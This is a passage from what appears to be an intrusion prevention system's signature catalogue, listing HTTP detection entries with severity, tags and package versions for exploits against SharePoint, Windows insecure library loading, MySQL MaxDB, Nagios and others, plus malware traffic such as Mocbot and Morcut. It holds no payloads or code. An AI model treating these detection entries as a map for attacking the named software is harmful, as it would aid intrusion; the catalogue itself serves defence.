About this situation: Detected attempt to exploit a vulnerability in Microsoft SharePoint
Context: HTTP Request URI
Severity: 10
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, Microsoft SharePoint Foundation, MS2013-03, CVE2013, Windows not specific, Microsoft Office SharePoint Server not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Microsoft-SharePoint-Directory-Traversal-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863

About this situation: Detected attempt to exploit a vulnerability in Microsoft SharePoint
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server 2007, Microsoft SharePoint Services, Microsoft SharePoint Foundation, MS2012-07, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-462-5211
Vulnerability: Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863
Description:
Back to top

HTTP_CSU-Microsoft-SharePoint-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2019, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Microsoft-SharePoint-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Sharepoint Services detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2010-06, CVE2010, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Microsoft-SharePoint-XSS-CVE-2012-1859

About this situation: Detected attempt to exploit a vulnerability in Microsoft SharePoint
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server 2010, Microsoft SharePoint Foundation, Microsoft Office Web Apps 2010, MS2012-07, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-462-5211
Vulnerability: Microsoft-SharePoint-XSS-CVE-2012-1859
Description:
Back to top

HTTP_CSU-Microsoft-Sharepoint-XSS-Vulnerability

About this situation: A vulnerability in Microsoft SharePoint
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2011-09, CVE2011, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Sharepoint-XSS-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083

About this situation: Detected attempt to exploit a vulnerability in Microsoft SharePoint
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2013-03, CVE2013, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083
Description:
Back to top

HTTP_CSU-Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854

About this situation: Detected attempt to exploit a vulnerability in Microsoft Visual Basic for Applications
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Basic for Applications, MS2012-07, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-462-5211
Vulnerability: Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854
Description:
Back to top

HTTP_CSU-Microsoft-Visio-Insecure-Library-Loading-CVE-2010-3148

About this situation: Detected attempt to exploit a vulnerability in Microsoft Visio
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio 2003, MS2011-07, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-403-4219
Last changed: sgpkg-ips-403-4219
Vulnerability: Microsoft-Visio-Insecure-Library-Loading-Vulnerability-CVE-2010-3148
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-12, MS2011-11, CVE2010, CVE2011, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
Microsoft-Windows-Mail-Remote-Code-Execution-CVE-2011-2016
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows Vista, Any Hardware, MS2011-01, CVE2010, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-369-4219
Vulnerability: Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
Description:
Back to top

HTTP_CSU-Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows 7, Windows 2008, Any Hardware, MS2010-12, CVE2010, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: HTTP Request URI
Severity: 7
Tags: Windows 2008, Any Hardware, MS2012-02, CVE2010, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Windows-Color-Control-Panel-Insecure-Library-Loading-CVE-2010-5082
Description:
Back to top

HTTP_CSU-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Any Hardware, MS2011-03, CVE2011, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-380-4219
Vulnerability: Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2011-09, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Microsoft-Windows-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519

About this situation: An attempt to exploit a vulnerability in Microsoft Windows .NET detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Media-Center-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-Windows-Media-Center-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows Media Encoder
Context: HTTP Request URI
Severity: 7
Tags: Windows XP, Windows Vista, Windows 2008, Any Hardware, Microsoft Windows Media Encoder, MS2010-12, CVE2010, Windows XP not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965
Description:
Back to top

HTTP_CSU-Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows Movie Maker
Context: HTTP Request URI
Severity: 7
Tags: Windows Vista, Any Hardware, Microsoft Windows Movie Maker, MS2010-12, CVE2010, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967
Description:
Back to top

HTTP_CSU-Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2011-08, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-865-5242
Vulnerability: Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2021-07, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1367-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467
Description:
Back to top

HTTP_CSU-Microweber-CMS-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Microweber detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Microweber, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Vulnerability: Microweber-CMS-Local-File-Inclusion
Description:
Back to top

HTTP_CSU-Miva-Htmlscript-Directory-Traversal

About this situation: Detects Directory Traversals on Miva htmlscript
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Miva htmlscript, CVE1999, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Miva-Htmlscript-Directory-Traversal
Description:
Back to top

HTTP_CSU-MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF

About this situation: Attempt to exploit a buffer overflow in mnoGoSearch search.cgi
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, mnoGoSearch, CVE2003, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF
Description:
Back to top

HTTP_CSU-MnoGoSearch-Search-Cgi-Ul-Parameter-BOF

About this situation: Attempt to exploit a buffer overflow in mnoGoSearch search.cgi
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, mnoGoSearch, CVE2003, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: MnoGoSearch-Search-Cgi-Ul-Parameter-BOF
Description:
Back to top

HTTP_CSU-Mocbot-Traffic

About this situation: MocBot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2006-08, CVE2006, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun
Mocbot
Description:
Back to top

HTTP_CSU-MODx-Manager-Console-Access-Attempt

About this situation: Access to MODx Manager console login page detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, MODx, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-533-5211
Vulnerability: Website-Admin-Console-Access
Description:
Back to top

HTTP_CSU-Morcut-Malware-Traffic-Detected

About this situation: Morcut Malware Traffic Detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Morcut, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Morcut-Malware
Description:
Back to top

HTTP_CSU-MosConfig-Code-Injection-Remote-Compromise

About this situation: An attempt to exploit a vulnerability in Joomla!
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-336-4219
Vulnerability: MosConfig-Absolute-Path-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CSU-Moxa-MXview-Path-Traversal-CVE-2021-38452

About this situation: An attempt to exploit a vulnerability in Moxa MXview detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Moxa MXview, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Vulnerability: Moxa-MXview-Path-Traversal-CVE-2021-38452
Description:
Back to top

HTTP_CSU-MOXA-SoftCMS-Cgi-Program-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Moxa SoftCMS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Moxa SoftCMS, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-805-5242
Vulnerability: MOXA-SoftCMS-Cgi-Program-SQL-Injection
Description:
Back to top

HTTP_CSU-Mozilla-Firefox-XSL-Transformation-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Mozilla-Firefox-XSL-Transformation-Memory-Corruption
Description:
Back to top

HTTP_CSU-MPM-Guestbook-Pro-Header-Php-Code-Injection

About this situation: MPM Guestbook Pro arbitrary php code execution
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, MPM Guestbook Pro, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-MPM-Guestbook-Pro-Header-Php-Code-Injection
Description:
Back to top

HTTP_CSU-MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004

About this situation: Attempt to bypass .aspx file access restrictions
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2005-02, CVE2004, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1010-5242
Vulnerability: MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004
Description:
Back to top

HTTP_CSU-MS-Exchange-URL-Redirection-CVE-2014-6336

About this situation: A vulnerability in Microsoft Exchange
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Exchange Server, MS2014-11, CVE2014, Windows not specific, Exchange Server not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: MS-Exchange-URL-Redirection-CVE-2014-6336
Description:
Back to top

HTTP_CSU-MS-Forefront-UAG-Default-Reflected-XSS

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront Unified Access Gateway detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1453-5242
Vulnerability: MS-Forefront-UAG-Default-Reflected-XSS
Description:
Back to top

HTTP_CSU-MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2013-03, CVE2013, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1188-5242
Vulnerability: Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
Description:
Back to top

HTTP_CSU-MS09-036

About this situation: MS09-036
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2009-08, Windows not specific, IIS not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: HTTP_MS09-036
Description:
Back to top

HTTP_CSU-MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908

About this situation: An attempt to exploit a vulnerability in MS Internet Explorer detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-11, CVE2013, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908
Description:
Back to top

HTTP_CSU-Muieblackcat-Scanner-Usage

About this situation: Muieblackcat Scanner activity detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Muieblackcat, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-505-5211
Vulnerability: HTTP-Muieblackcat-Scanner
Description:
Back to top

HTTP_CSU-Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass

About this situation: An attempt to exploit a Multiple AV Vendor Invalid Archive Checksum Bypass vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Generic Antivirus, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass
Description:
Back to top

HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities

About this situation: An attempt to exploit a directory traversal vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Modbus SCADA, ScadaMobile ONE v2.5.2, Schneider Electric Vijeo Web Gate Server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Modbus-SCADA-Directory-Traversal
ScadaMobile-One-v2.5.2-Directory-Traversal
Schneider-Electric-Vijeo-Web-Gate-Server-Directory-Traversal
Ruby-On-Rails-Directory-Traversal-CVE-2014-0130
Description:
Back to top

HTTP_CSU-Multiple-DVR-Manufacturers-Configuration-Disclosure

About this situation: An attempt to exploit a Multiple DVR Manufacturers Configuration Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, CVE2013, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Multiple-DVR-Manufacturers-Configuration-Disclosure
Description:
Back to top

HTTP_CSU-MyBB-Domecode-Function-Php-Code-Execution

About this situation: Detects PHP code execution exploits against MyBB
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MyBB, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-MyBB-Domecode-Function-Php-Code-Execution
Description:
Back to top

HTTP_CSU-Myloader-Activity

About this situation: MyLoader activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Myloader
Description:
Back to top

HTTP_CSU-MySQL-MaxDB-WebDBM-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in MySQL MaxDB WebDBM service
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, MySQL, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1780-5242
Vulnerability: TCP-MySQL-MaxDB-WebDBM-BOF
Description:
Back to top

HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-2

About this situation: Attempt to exploit buffer overflow vulnerability in MySQL MaxDB WebDBM service
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, MySQL, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-926-5242
Vulnerability: TCP-MySQL-MaxDB-WebDBM-BOF
Description:
Back to top

HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-3

About this situation: Attempt to exploit buffer overflow vulnerability in MySQL MaxDB WebDBM service
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, MySQL, CVE2005, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-494-5211
Vulnerability: TCP-MySQL-MaxDB-WebDBM-BOF
Description:
Back to top

HTTP_CSU-Nagios-Core-Cgi-Process_cgivars-Off-By-One

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Core detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Nagios-Core-Cgi-Process_cgivars-Off-By-One
Description:
Back to top

HTTP_CSU-Nagios-XI-Alert-Cloud-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-509-5211
